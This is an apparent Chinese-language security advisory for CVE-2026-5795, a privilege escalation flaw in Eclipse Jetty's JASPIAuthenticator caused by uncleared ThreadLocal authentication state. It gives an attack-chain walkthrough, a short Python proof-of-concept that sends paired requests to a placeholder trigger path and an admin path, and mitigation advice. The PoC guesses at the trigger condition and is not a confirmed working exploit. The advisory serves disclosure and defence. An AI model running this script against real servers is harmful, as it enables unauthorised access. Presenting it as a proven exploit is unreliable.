CVE-2026-5795 CVSS 7.4 高危

CVE-2026-5795 Eclipse Jetty权限提升漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5795

漏洞类型

权限提升

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse Jetty

漏洞概述

Eclipse Jetty的JASPIAuthenticator类在认证过程中，因ThreadLocal变量未在异常或提前返回时清理，导致线程复用时请求继承了错误的认证上下文，从而引发权限提升。

技术细节

该漏洞源于Eclipse Jetty中JASPIAuthenticator类的实现缺陷。在执行认证检查时，代码会利用ThreadLocal变量存储临时认证状态。然而，当满足特定条件导致代码提前返回时，这些ThreadLocal变量未被清除。由于Web服务器通常使用线程池处理并发请求，当该线程被复用以处理后续请求时，新请求会意外读取到上一个请求残留的ThreadLocal认证信息。这导致访问控制机制失效，攻击者可利用此漏洞绕过认证，获得更高权限。

攻击链分析

STEP 1

步骤1

攻击者向目标Eclipse Jetty服务器发送特制的HTTP请求，触发JASPIAuthenticator的认证检查流程。

STEP 2

步骤2

由于代码逻辑缺陷，认证流程在特定条件下提前返回，未清除ThreadLocal中存储的认证上下文信息。

STEP 3

步骤3

Jetty线程池复用该处理线程来处理攻击者发送的第二个请求。

STEP 4

步骤4

第二个请求读取到ThreadLocal中残留的高权限认证信息，从而绕过访问控制检查，成功获取敏感数据或执行高权限操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target = "http://vulnerable-jetty-server:8080/app"

# Step 1: Send a request that triggers the JASPIAuthenticator early return logic
# This request might aim to trigger a specific condition that leaves ThreadLocals dirty
print("[+] Step 1: Triggering vulnerability to set ThreadLocal...")
try:
    requests.get(target + "/auth-trigger", timeout=5)
except Exception as e:
    print(f"[!] First request completed (可能触发提前返回): {e}")

# Step 2: Send a subsequent request immediately, hoping to hit the same thread
# This request should inherit the privileges if the exploit is successful
print("[+] Step 2: Sending subsequent request to check privilege escalation...")
response = requests.get(target + "/admin/protected-resource")

if response.status_code == 200:
    print("[+] Success! Privilege escalation confirmed. Access granted to protected resource.")
else:
    print("[-] Failed. Access denied.")

影响范围

Eclipse Jetty (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

建议立即检查所使用的Eclipse Jetty版本，并关注官方发布的修复补丁。在未升级前，可考虑临时禁用JASPIAuthenticator相关功能，或对受影响的应用接口实施额外的网络层访问控制，以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表